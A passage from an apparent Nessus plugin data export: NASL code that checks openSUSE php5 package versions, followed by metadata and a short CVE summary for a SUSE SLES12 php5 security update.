rpm_check(release:\"SUSE42.2\", reference:\"php5-json-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ldap-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-ldap-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mbstring-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mbstring-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mcrypt-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mcrypt-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mssql-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mssql-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mysql-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-mysql-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-odbc-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-odbc-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-opcache-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-opcache-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-openssl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-openssl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pcntl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pcntl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pdo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pdo-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pear-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pgsql-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pgsql-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-phar-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-phar-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-posix-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-posix-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pspell-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-pspell-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-readline-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-readline-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-shmop-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-shmop-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-snmp-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-snmp-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-soap-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-soap-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sockets-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sockets-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sqlite-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sqlite-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-suhosin-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-suhosin-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvmsg-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvmsg-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvsem-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvsem-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvshm-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-sysvshm-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tidy-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tidy-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tokenizer-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-tokenizer-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-wddx-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-wddx-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlreader-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlreader-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlrpc-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlrpc-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlwriter-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xmlwriter-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xsl-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-xsl-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zip-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zip-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zlib-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php5-zlib-debuginfo-5.5.14-77.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php5-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php5-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bcmath-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bcmath-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bz2-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-bz2-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-calendar-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-calendar-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ctype-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ctype-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-curl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-curl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dba-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dba-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-debugsource-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-devel-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dom-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-dom-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-enchant-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-enchant-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-exif-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-exif-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fastcgi-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fastcgi-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fileinfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fileinfo-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-firebird-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-firebird-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fpm-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-fpm-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ftp-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ftp-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gd-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gd-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gettext-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gettext-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gmp-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-gmp-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-iconv-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-iconv-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-imap-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-imap-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-intl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-intl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-json-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-json-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ldap-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-ldap-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mbstring-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mbstring-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mcrypt-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mcrypt-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mssql-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mssql-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mysql-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-mysql-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-odbc-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-odbc-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-opcache-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-opcache-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-openssl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-openssl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pcntl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pcntl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pdo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pdo-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pear-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pgsql-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pgsql-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-phar-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-phar-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-posix-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-posix-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pspell-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-pspell-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-readline-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-readline-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-shmop-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-shmop-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-snmp-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-snmp-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-soap-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-soap-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sockets-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sockets-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sqlite-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sqlite-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-suhosin-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-suhosin-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvmsg-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvmsg-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvsem-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvsem-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvshm-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-sysvshm-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tidy-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tidy-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tokenizer-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-tokenizer-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-wddx-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-wddx-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlreader-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlreader-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlrpc-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlrpc-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlwriter-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xmlwriter-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xsl-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-xsl-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zip-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zip-debuginfo-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zlib-5.5.14-82.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php5-zlib-debuginfo-5.5.14-82.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:54", "description": "This update for php5 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host. (bsc#1047454)\n\n - CVE-2017-11143: An invalid free in the WDDX deserialization of booleanparameters could be used by attackers able to inject XML for deserialization tocrash the PHP interpreter. (bsc#1048097)\n\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the return value of the OpenSSL sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code could lead to information leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by attackers supplying malicious archive files to crash the PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting could lead to heap overflow (bsc#986386)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() in Zend/zend_ini_parser.c (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function could lead to denial of service (bsc#1050241)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2017:2317-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2016-5766", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11146", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-7890"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debugsource", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php5-enchant", "p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fpm", "p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-json-debuginfo", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php5-imap", "p-cpe:/a:novell:suse_linux:php5-imap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-intl", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mysql", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-opcache", "p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-zlib", "p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pdo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-phar", "p-cpe:/a:novell:suse_linux:php5-phar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-posix", "p-cpe:/a:novell:suse_linux:php5-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php5-shmop", "p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php5-snmp", "p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sockets", "p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sqlite", "p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo"], "id": "SUSE_SU-2017-2317-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2317-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120004);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\n \"CVE-2016-5766\",\n \"CVE-2016-10397\",\n \"CVE-2017-7890\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n 